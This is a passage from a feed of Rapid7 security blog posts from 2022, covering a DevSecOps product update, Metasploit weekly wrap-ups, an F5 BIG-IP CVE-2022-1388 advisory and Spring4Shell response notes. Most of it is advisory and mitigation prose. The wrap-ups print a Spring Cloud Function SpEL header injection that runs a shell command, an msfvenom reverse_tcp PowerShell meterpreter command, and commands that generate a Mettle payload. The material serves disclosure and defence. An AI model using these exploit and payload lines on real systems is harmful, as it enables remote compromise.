keep up with the speed of innovation. Taking a [DevSecOps](<https://www.rapid7.com/fundamentals/devsecops/>) approach means baking security across the application lifecycle and includes shifting left whenever possible.\n\n[Dynamic application security testing (DAST)](<https://www.rapid7.com/fundamentals/dast/>) solutions simulate attacks just like the attackers, and they're known for their accuracy and coverage across a wide range of technologies. However, traditional DAST solutions have struggled to work with modern applications and software development methodologies.\n\nSince the launch of InsightAppSec \u2014 Rapid7's industry leading cloud-native DAST \u2014 we've focused on providing coverage of modern applications, as well as being able to integrate as far left as the build process.\n\n> _\u201cOur app developers don't need to come to me, they don't need to come to our team, they don't need to send emails. They don't need to go through any formalities. When they commit code, the scan happens automatically. And, we created the metrics. So, if they see high-rated vulnerabilities they cannot push to production. The code will get blocked and they have to remediate it.\"_ \n \n_\\- Midhun Kumar, Head of Infrastructure and Cloud Operations, _[_Pearl Data Direct_](<https://www.rapid7.com/about/customers/pearl-data-direct/>)\n\nBuilding on the success of our [Jenkins Plugin](<https://extensions.rapid7.com/extension/insightappsec-jenkins-plugin>), [Atlassian Bamboo Plugin](<https://extensions.rapid7.com/extension/insightappsec-bamboo-plugin>), and [Azure DevOps](<https://extensions.rapid7.com/extension/insightappsec-azure-devops-extension>) CI/CD integrations, we recently added native [GitHub Actions](<https://github.com/marketplace/actions/rapid7-insightappsec-scan>) and [GitLab CI/CD](<https://extensions.rapid7.com/extension/insightappsec-scan-gitlab>) integrations into InsightAppSec.\n\n### GitHub\n\n[GitHub Actions](<https://github.com/features/actions>) allows development teams to automate software workflows. With our new [InsightAppSec Scan Action for GitHub](<https://www.rapid7.com/blog/post/2022/03/02/insightappsec-github-integration-keeps-risky-code-from-reaching-production/>), you can easily pull down the repo and add it to your DevOps pipelines. As part of your actions, you can trigger the InsightAppSec scan and have the results passed back into GitHub actions. If you want, you can add scan gating to prevent vulnerable code from being deployed to production.\n\nThis is available for no additional cost in the [GitHub Marketplace](<https://github.com/marketplace/actions/rapid7-insightappsec-scan>).\n\n### GitLab\n\n[GitLab CI/CD](<https://about.gitlab.com/stages-devops-lifecycle/continuous-integration/>) can automatically build, test, deploy, and monitor your applications. With our new InsightAppSec Scan Job, you can add a Docker command in your pipeline to trigger a scan. The results are sent back, and you can add scan gating to prevent vulnerable code from being deployed to production.\n\nThe feature is available for no additional cost, and we have resources to help you learn [how to setup the GitLab integration](<https://docs.rapid7.com/insightappsec/gitlab-integration/>).\n\n## Spring4Shell testing and protection\n\n[CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), a zero-day vulnerability announced on April 1st, is no April Fools' Day joke. While it's not as dreadful as [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), it should still be patched, and there are reports of the Spring4Shell flaw being used to install the Mirai Botnet malware.\n\nTo help our customers secure their applications and understand their risk from Spring4Shell, Rapid7 released [new capabilities](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>), including:\n\n * New RCE Attack Module for Spring4Shell (InsightAppSec)\n * New Block Rule for Spring4Shell (tCell)\n * New Detection of CVE-2022-22965 in running applications (tCell)\n\n## Other enhancements\n\nInsightAppSec comes with the ability to create custom dashboards to quickly view and get insights on the risk and status of your program. Relying on feedback from customers, we recently added the ability to create dashboards based on certain apps or groups of apps. This allows you to quickly view risk in context of what matters.\n\nCustomers often like to manage their applications at scale, and one of the easiest ways to do that is via the tCell API. Significant feature enhancements include App Firewall event and block rules, OS commands, Local Files, suspicious actors, and more have all been added or updated. Check out our [API documentation](<https://docs.rapid7.com/tcell/api/>).\n\nRapid7's application security portfolio can help you shift left as well as shift right, depending on your needs and the status of your program. You can integrate InsightAppSec DAST into your CI/CD pipelines before deployment to production. And with tCell, you can add web application and API protection for your production environments.\n\nStay tuned for all we have in store in Q2!\n\n_**Additional reading**_\n\n * _[Securing Your Applications Against Spring4Shell (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>)_\n * _[InsightAppSec GitHub Integration Keeps Risky Code From Reaching Production](<https://www.rapid7.com/blog/post/2022/03/02/insightappsec-github-integration-keeps-risky-code-from-reaching-production/>)_\n * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_\n * _[A Dream Team-Up: Integrate InsightAppSec With ServiceNow ITSM](<https://www.rapid7.com/blog/post/2021/12/08/a-dream-team-up-integrate-insightappsec-with-servicenow-itsm/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-15T14:22:55", "type": "rapid7blog", "title": "Let's Dance: InsightAppSec and tCell Bring New DevSecOps Improvements in Q1", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22965"], "modified": "2022-04-15T14:22:55", "id": "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "href": "https://blog.rapid7.com/2022/04/15/lets-dance-insightappsec-and-tcell-bring-new-devsecops-improvements-in-q1/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-06T16:15:25", "description": "## CVE-2022-22963 - Spring Cloud Function SpEL RCE\n\n\n\nA new `exploit/multi/http/spring_cloud_function_spel_injection` module has been developed by our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to [Spring4Shell CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), which is a separate vulnerability in the WebDataBinder component of Spring Framework.\n\nThis exploit works by crafting an unauthenticated HTTP request to the target application. When the `spring.cloud.function.routing-expression` HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the [CVE-2022-22963 Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16395/files#diff-85438aef360f2d47359f2cb9d7f9f52465f8bc23f2d9b6fa04fc4fef6eef69dbR109-R111>):\n \n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n \n\nBoth patched and unpatched servers will respond with a 500 server error and a JSON encoded message\n\n## New module content (1)\n\n * [Spring Cloud Function SpEL Injection](<https://github.com/rapid7/metasploit-framework/pull/16395>) by Spencer McIntyre, hktalent, and m09u3r, which exploits [CVE-2022-22963](<https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963?referrer=blog>) \\- This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to `3.1.7` and `3.2.3`.\n\n## Bugs fixed (2)\n\n * [#16364](<https://github.com/rapid7/metasploit-framework/pull/16364>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a fix for a crash in `auxiliary/spoof/dns/native_spoofer` and adds documentation for the module.\n * [#16386](<https://github.com/rapid7/metasploit-framework/pull/16386>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when running the `exploit/multi/misc/java_rmi_server` module against at target server, such as Metasploitable2\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-24T13%3A07%3A34-04%3A00..2022-03-31T11%3A00%3A06-05%3A00%22>)\n * [Full diff 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/compare/6.1.35...6.1.36>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T18:34:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T18:34:29", "id": "RAPID7BLOG:F708A09CA1EFFC0565CA94D5DBC414D5", "href": "https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T13:29:14", "description": "\n\nWe have completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. We continue to monitor for new vulnerability instances and to remediate vulnerabilities on internally accessible services. We also continue to monitor our environment for anomalous activity, having found none so far. No action is required by our customers at this time.\n\n## Further reading and recommendations\n\nOur Emergent Threat Response team has put together a [detailed blog post](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) with general guidance about how to mitigate and remediate Spring4Shell. We will continue updating that post as we learn more about Spring4Shell and new remediation and mitigation approaches.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T14:42:42", "type": "rapid7blog", "title": "Update on Spring4Shell\u2019s Impact on Rapid7 Solutions and Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T14:42:42", "id": "RAPID7BLOG:46F0D57262DABE81708D657F2733AA5D", "href": "https://blog.rapid7.com/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T17:31:10", "description": "## Spring4Shell module\n\n\n\nCommunity contributor [vleminator](<https://github.com/vleminator>) added [a new module](<https://github.com/rapid7/metasploit-framework/pull/16423>) which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>)\u2014more commonly known as "Spring4Shell." [Depending on its deployment configuration](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965/rapid7-analysis?referrer=blog>), Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.\n\n## F5 BIG-IP iControl RCE via REST Authentication Bypass module\n\nIn addition, we have [a new module](<https://github.com/rapid7/metasploit-framework/pull/16549>) that targets F5 iControl and exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>), from contributor [heyder](<https://github.com/heyder>). This vulnerability allows attackers to bypass iControl's REST authentication on [affected versions](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis?referrer=blog>) and achieve unauthenticated remote code execution as `root` via the `/mgmt/tm/util/bash` endpoint.\n\n## Cisco RV340 SSL VPN RCE module\n\nThe last of the new RCE modules this week\u2014community contributor [pedrib](<https://github.com/pedrib>) added [a Cisco RV340 SSL VPN module](<https://github.com/rapid7/metasploit-framework/pull/16169>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>). This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.\n\n## First Class PowerShell Command Payloads\n\nMetasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new `cmd/windows/powershell*` payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.\n\nSince these are new payload modules, they can also be generated directly using MSFVenom:\n \n \n ./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128\n \n\nThis is similar to using one of the `psh-` formatters with the existing `-f` option. However, because it\u2019s a payload module, the additional [Powershell specific options](<https://github.com/rapid7/metasploit-framework/blob/93a7ae26a1e85f82de8647460a0c245bf95e6b00/lib/msf/core/exploit/powershell.rb#L10>) are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting `Powershell::encode_final_payload=true`.\n\n## New module content (4)\n\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>) \\- A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [Cisco RV340 SSL VPN RCE](<https://github.com/rapid7/metasploit-framework/pull/16169>) from [pedrib](<https://github.com/pedrib>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>) \\- A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the `root` user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.\n * [Spring Framework Class property RCE (Spring4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16423>) by [vleminator](<https://github.com/vleminator>), which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>) \\- This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a `war` file, though it may be possible to bypass these limitations later.\n * [Powershell Command Adapter](<https://github.com/rapid7/metasploit-framework/pull/16548>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.\n\n## Enhancements and features (4)\n\n * [#16529](<https://github.com/rapid7/metasploit-framework/pull/16529>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:\n \n \n use osx/x64/meterpreter_reverse_tcp\n generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'\n to_handler\n \n\n * [#16538](<https://github.com/rapid7/metasploit-framework/pull/16538>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.\n * [#16551](<https://github.com/rapid7/metasploit-framework/pull/16551>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.\n * [#16553](<https://github.com/rapid7/metasploit-framework/pull/16553>) from [mauvehed](<https://github.com/mauvehed>) \\- This updates Metasploit's `.github/SECURITY.md` file with the latest steps to follow when raising security issues with Rapid7's open source projects.\n\n## Bugs fixed (8)\n\n * [#16485](<https://github.com/rapid7/metasploit-framework/pull/16485>) from [jeffmcjunkin](<https://github.com/jeffmcjunkin>) \\- This updates the version check for the `exploit/windows/local/s4u_persistence` module to allow it to run on later Windows versions.\n * [#16491](<https://github.com/rapid7/metasploit-framework/pull/16491>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.\n * [#16531](<https://github.com/rapid7/metasploit-framework/pull/16531>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in various pihole modules when login authentication is required.\n * [#16533](<https://github.com/rapid7/metasploit-framework/pull/16533>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with `-w 32` or `-w 64` \\- previously these flag values were unintentionally ignored.\n * [#16540](<https://github.com/rapid7/metasploit-framework/pull/16540>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.\n * [#16542](<https://github.com/rapid7/metasploit-framework/pull/16542>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This fixes a bug in msfconsole's internal book keeping to ensure that closed channels are no longer tracked.\n * [#16544](<https://github.com/rapid7/metasploit-framework/pull/16544>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates post module `windows/gather/ad_to_sqlite` to no longer crash. The module will now additionally store the extracted information as loot.\n * [#16560](<https://github.com/rapid7/metasploit-framework/pull/16560>) from [Ronni3X](<https://github.com/Ronni3X>) \\- This updates the `nessus_connect` login functionality to correctly handle the `@` symbol being present in the password.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-05T11%3A16%3A04-05%3A00..2022-05-12T07%3A30%3A04-05%3A00%22>)\n * [Full diff 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/compare/6.1.41...6.1.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T16:52:59", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-20699", "CVE-2022-22965"], "modified": "2022-05-13T16:52:59", "id": "RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA", "href": "https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T19:31:05", "description": "\n\nOn May 4, 2022, F5 released [an advisory](<https://support.f5.com/csp/article/K55879220>) listing several vulnerabilities, including [CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 base score of 9.8.\n\nThe vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:\n\n * F5 BIG-IP 16.1.0 - 16.1.2 (patched in 16.1.2.2)\n * F5 BIG-IP 15.1.0 - 15.1.5 (patched in 15.1.5.1)\n * F5 BIG-IP 14.1.0 - 14.1.4 (patched in 14.1.4.6)\n * F5 BIG-IP 13.1.0 - 13.1.4 (patched in 13.1.5)\n * F5 BIG-IP 12.1.0 - 12.1.6 (no patch available, will not fix)\n * F5 BIG-IP 11.6.1 - 11.6.5 (no patch available, will not fix)\n\nOn Monday, May 9, 2022, [Horizon3](<https://www.horizon3.ai/>) released a [full proof of concept](<https://github.com/horizon3ai/CVE-2022-1388>), which we successfully executed to get a root shell. Other groups have [developed exploits](<https://www.bleepingcomputer.com/news/security/exploits-created-for-critical-f5-big-ip-flaw-install-patch-immediately/>) as well.\n\nOver the past few days, [BinaryEdge](<https://www.binaryedge.io/>) has detected an increase in [scanning and exploitation](<https://twitter.com/Balgan/status/1523683322446381059>) for F5 BIG-IP. Others on Twitter have also [observed exploitation attempts](<https://twitter.com/1ZRR4H/status/1523572874061422593>). Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.\n\nWidespread exploitation is somewhat mitigated by the small number of internet-facing F5 BIG-IP devices, however; our best guess is that there are only [about 2,500 targets on the internet](<https://twitter.com/Junior_Baines/status/1522205355287228416>).\n\n## Mitigation guidance\n\nF5 customers should patch their BIG-IP devices as quickly as possible using [F5's upgrade instructions](<https://support.f5.com/csp/article/K84205182>). Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level \u2014 only authorized users should be able to reach the management interface at all.\n\nF5 also [provides a workaround as part of their advisory](<https://support.f5.com/csp/article/K23605346>). If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.\n\nExploit attempts appear in at least [two different log files](<https://twitter.com/n0x08/status/1523701663290122240>):\n\n * /var/log/audit\n * /var/log/restjavad-audit.0.log\n\nBecause this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388/>) in the May 5, 2022 content release. This release also includes authenticated vulnerability checks for additional CVEs in F5's [May 2022 security advisory](<https://support.f5.com/csp/article/K55879220>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>)_\n * _[Opportunistic Exploitation of WSO2 CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>)_\n * _[Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>)_\n * _[CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel](<https://www.rapid7.com/blog/post/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:57:00", "type": "rapid7blog", "title": "Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0847", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22965", "CVE-2022-29464"], "modified": "2022-05-09T17:57:00", "id": "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "href": "https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\n_Rapid7 has completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. For further information and updates about our internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>)._\n\nIf you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). While discovery and research is evolving, we\u2019re posting the facts we\u2019ve gathered and updating guidance as new information becomes available.\n\n## What Rapid7 Customers Can Expect\n\nThis is an evolving incident. Our team is continuing to investigate and validate additional information about this vulnerability and its impact. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates.\n\n### Vulnerability Risk Management\n\nThe April 1, 2022 content update released at 7:30 PM EDT contains authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release the week of April 11 to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable. We also have an authenticated Windows check available as of the April 7th content release, which requires the April 6th product release (version 6.6.135). More information on how to scan for Spring4Shell with 